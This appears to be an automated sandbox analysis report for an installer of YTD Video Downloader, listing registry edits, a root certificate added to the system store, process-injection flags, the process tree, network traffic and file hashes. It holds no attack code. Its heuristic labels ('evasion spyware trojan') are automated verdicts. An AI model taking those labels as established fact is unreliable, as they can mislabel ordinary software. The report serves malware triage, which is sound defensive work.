Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000303eef0e2cd1a9499efdd285a56ddc5000000000020000000000106600000001000020000000e70ba86eace7beae1d48ebb632675933f92591931a7167d230ff08fd97522c10000000000e8000000002000020000000b1a0518e473844730f9f4fd4a7ce01568f04a1bba9196bbfe51e32ff34c9d1fc200000002ff96b4e5a4e592719cd5c31949b51166f5672ee617f6a77cfb6db67e9600f7f400000003023c7b13ed15c2a5321eb00302ee3d74ff710d343f742288c94979eccab5e3e3cb24d7db07441f3bc17cb31261d1af87b39f6b418e38374576a6f4d56d308de C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d4624030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e260f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a040000000100000010000000324a4bbbc863699bbe749ac6dd1d46242000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2416 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe C:\Users\Admin\AppData\Local\Temp\is-8FG93.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp
PID 2416 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe C:\Users\Admin\AppData\Local\Temp\is-8FG93.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp
PID 2416 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe C:\Users\Admin\AppData\Local\Temp\is-8FG93.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp
PID 2416 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe C:\Users\Admin\AppData\Local\Temp\is-8FG93.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp
PID 2416 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe C:\Users\Admin\AppData\Local\Temp\is-8FG93.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp
PID 2416 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe C:\Users\Admin\AppData\Local\Temp\is-8FG93.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp
PID 2416 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe C:\Users\Admin\AppData\Local\Temp\is-8FG93.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp
PID 2072 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\is-8FG93.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe
PID 2072 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\is-8FG93.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe
PID 2072 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\is-8FG93.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe
PID 2072 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\is-8FG93.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe
PID 2072 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\is-8FG93.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe
PID 2072 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\is-8FG93.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe
PID 2072 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\is-8FG93.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe
PID 2412 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe C:\Windows\explorer.exe
PID 2412 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe C:\Windows\explorer.exe
PID 2412 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe C:\Windows\explorer.exe
PID 2412 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe C:\Windows\explorer.exe
PID 2516 wrote to memory of 1188 N/A C:\Windows\explorer.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2516 wrote to memory of 1188 N/A C:\Windows\explorer.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2516 wrote to memory of 1188 N/A C:\Windows\explorer.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 1188 wrote to memory of 1304 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1188 wrote to memory of 1304 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1188 wrote to memory of 1304 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1188 wrote to memory of 1304 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2412 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe C:\Windows\explorer.exe
PID 2412 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe C:\Windows\explorer.exe
PID 2412 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe C:\Windows\explorer.exe
PID 2412 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe C:\Windows\explorer.exe
PID 2976 wrote to memory of 1904 N/A C:\Windows\explorer.exe C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe
PID 2976 wrote to memory of 1904 N/A C:\Windows\explorer.exe C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe
PID 2976 wrote to memory of 1904 N/A C:\Windows\explorer.exe C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe
PID 2976 wrote to memory of 1904 N/A C:\Windows\explorer.exe C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe
PID 1188 wrote to memory of 2436 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1188 wrote to memory of 2436 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1188 wrote to memory of 2436 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1188 wrote to memory of 2436 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1904 wrote to memory of 912 N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe C:\Windows\SysWOW64\WerFault.exe
PID 1904 wrote to memory of 912 N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe C:\Windows\SysWOW64\WerFault.exe
PID 1904 wrote to memory of 912 N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe C:\Windows\SysWOW64\WerFault.exe
PID 1904 wrote to memory of 912 N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe

"C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe"

C:\Users\Admin\AppData\Local\Temp\is-8FG93.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp

"C:\Users\Admin\AppData\Local\Temp\is-8FG93.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp" /SL5="$5014E,116245401,999936,C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe"

C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe

"C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe" "http://www.ytddownloader.com/thankyou.html?isn=726E4E9A08134383846087603581901B&lang=1033&cid=bea3b60f7c56915a47cb6bcf8ab37087&oldVer=&newVer=5.9.18&kt=ytdd&pv=0"

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://www.ytddownloader.com/thankyou.html?isn=726E4E9A08134383846087603581901B&lang=1033&cid=bea3b60f7c56915a47cb6bcf8ab37087&oldVer=&newVer=5.9.18&kt=ytdd&pv=0

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1188 CREDAT:275457 /prefetch:2

C:\Windows\explorer.exe

"C:\Windows\explorer.exe" "C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe

"C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1188 CREDAT:537606 /prefetch:2

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 2404

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.ytddownloader.com udp
US 107.23.224.174:80 www.ytddownloader.com tcp
US 107.23.224.174:443 www.ytddownloader.com tcp
US 107.23.224.174:80 www.ytddownloader.com tcp
US 8.8.8.8:53 www.ytddownloader.com udp
US 8.8.8.8:53 www.ytddownloader.com udp
US 18.214.189.112:443 www.ytddownloader.com tcp
US 8.8.8.8:53 www.ytddownloader.com udp
US 52.44.216.207:80 www.ytddownloader.com tcp
US 52.44.216.207:80 www.ytddownloader.com tcp
US 52.44.216.207:443 www.ytddownloader.com tcp
US 52.44.216.207:443 www.ytddownloader.com tcp
US 8.8.8.8:53 ocsp.r2m02.amazontrust.com udp
US 8.8.8.8:53 ocsp.r2m02.amazontrust.com udp
DE 3.162.87.26:80 ocsp.r2m02.amazontrust.com tcp
DE 3.162.87.26:80 ocsp.r2m02.amazontrust.com tcp
US 52.44.216.207:80 www.ytddownloader.com tcp
US 8.8.8.8:53 app.termly.io udp
US 52.44.216.207:443 www.ytddownloader.com tcp
US 8.8.8.8:53 ajax.googleapis.com udp
US 52.44.216.207:443 www.ytddownloader.com tcp
US 52.44.216.207:443 www.ytddownloader.com tcp
US 52.44.216.207:443 www.ytddownloader.com tcp
US 52.44.216.207:443 www.ytddownloader.com tcp
GB 172.217.16.234:443 ajax.googleapis.com tcp
GB 172.217.16.234:443 ajax.googleapis.com tcp
US 104.18.30.234:443 app.termly.io tcp
US 104.18.30.234:443 app.termly.io tcp
US 8.8.8.8:53 c.pki.goog udp
US 8.8.8.8:53 c.pki.goog udp
US 52.44.216.207:443 www.ytddownloader.com tcp
US 8.8.8.8:53 c.pki.goog udp
US 8.8.8.8:53 c.pki.goog udp
GB 172.217.169.78:80 www.google-analytics.com tcp
GB 172.217.169.67:80 c.pki.goog tcp
GB 172.217.169.67:80 c.pki.goog tcp
GB 172.217.169.67:80 c.pki.goog tcp
GB 172.217.169.67:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
US 8.8.8.8:53 o.pki.goog udp
US 8.8.8.8:53 o.pki.goog udp
US 52.44.216.207:443 www.ytddownloader.com tcp
US 52.44.216.207:443 www.ytddownloader.com tcp
US 52.44.216.207:443 www.ytddownloader.com tcp
GB 172.217.169.67:80 o.pki.goog tcp
GB 172.217.169.67:80 o.pki.goog tcp
GB 172.217.169.67:80 o.pki.goog tcp
GB 172.217.169.67:80 o.pki.goog tcp
US 52.44.216.207:443 www.ytddownloader.com tcp
US 52.44.216.207:80 www.ytddownloader.com tcp
US 52.44.216.207:80 www.ytddownloader.com tcp
US 52.44.216.207:443 www.ytddownloader.com tcp
US 104.18.30.234:443 app.termly.io tcp
GB 172.217.169.67:80 o.pki.goog tcp
US 104.18.30.234:443 app.termly.io tcp
US 104.18.30.234:443 app.termly.io tcp
US 52.44.216.207:443 www.ytddownloader.com tcp
US 52.44.216.207:443 www.ytddownloader.com tcp
US 8.8.8.8:53 js.braintreegateway.com udp
US 8.8.8.8:53 www.google.com udp
US 52.44.216.207:443 www.ytddownloader.com tcp
US 8.8.8.8:53 pay.google.com udp
US 52.44.216.207:443 www.ytddownloader.com tcp
US 52.44.216.207:443 www.ytddownloader.com tcp
GB 216.58.204.68:443 www.google.com tcp
GB 216.58.204.68:443 www.google.com tcp
SE 192.229.221.25:443 js.braintreegateway.com tcp
SE 192.229.221.25:443 js.braintreegateway.com tcp
SE 192.229.221.25:443 js.braintreegateway.com tcp
SE 192.229.221.25:443 js.braintreegateway.com tcp
NL 142.250.102.92:443 pay.google.com tcp
NL 142.250.102.92:443 pay.google.com tcp
GB 172.217.169.67:80 o.pki.goog tcp
GB 172.217.169.67:80 o.pki.goog tcp
GB 172.217.169.67:80 o.pki.goog tcp
GB 172.217.169.67:80 o.pki.goog tcp
US 104.18.30.234:443 app.termly.io tcp
US 8.8.8.8:53 s3-us-west-2.amazonaws.com udp
US 52.92.165.136:443 s3-us-west-2.amazonaws.com tcp
US 52.92.165.136:443 s3-us-west-2.amazonaws.com tcp
US 8.8.8.8:53 ocsp.r2m01.amazontrust.com udp
US 8.8.8.8:53 ocsp.r2m01.amazontrust.com udp
DE 3.162.87.26:80 ocsp.r2m01.amazontrust.com tcp
DE 3.162.87.26:80 ocsp.r2m01.amazontrust.com tcp
US 8.8.8.8:53 dl.ytddownloader.com udp
US 34.230.189.139:443 dl.ytddownloader.com tcp
GB 172.217.16.234:80 ajax.googleapis.com tcp
US 8.8.8.8:53 ssl.google-analytics.com udp
GB 142.250.187.200:443 ssl.google-analytics.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

memory/2416-0-0x0000000000400000-0x0000000000501000-memory.dmp

memory/2416-2-0x0000000000401000-0x00000000004B7000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-8FG93.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp

MD5 34fb289e9fee64cd7d4b588f0af35a87
SHA1 749822f7891caaca3fcda698a1f3a88afa76b26c
SHA256 61fbf0a6084bd7bab3ed214f1c372a569af302ee353e59ddb4f9f65436bf9b55
SHA512 9bc594e241747faadb3295792eff37c76a6f4ff1a0f0c91e63fd45905da15239a1aed8bba55006f32310633609fa43132616cbea30b3a104843f2b553b58adaa

memory/2072-8-0x0000000000400000-0x0000000000723000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\_isetup\_isdecmp.dll

MD5 c6ae924ad02500284f7e4efa11fa7cfc
SHA1 2a7770b473b0a7dc9a331d017297ff5af400fed8
SHA256 31d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26
SHA512 f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae

\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe

MD5 37c8ee1cae9779ec094be29a35a5061d
SHA1 ae99157bda438ad024e38dd91a975246b00dd557
SHA256 0ac4b34f2a8f9c004f6c942ce112a0ab87bb1c2b17a7dd745519eb414ebdae35
SHA512 e725a2ec6f3550e8de89b200f4bb79f808f14d6da04d4a80629ecb1b428ba0c74a0468e7b7bb53d89744bbba19066f4799e3a84951d21215ce0b72edf0798728

\Users\Admin\AppData\Local\Temp\nsyE0FE.tmp\System.dll

MD5 0d7ad4f45dc6f5aa87f606d0331c6901
SHA1 48df0911f0484cbe2a8cdd5362140b63c41ee457
SHA256 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
SHA512 c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

C:\Users\Admin\AppData\Local\Temp\nsyE0FE.tmp\NSISHelper.dll

MD5 373c6ac98ae82cf341394215d28b5830
SHA1 2e3542372f1e520cdd47d30035dda85fdd2b11f9
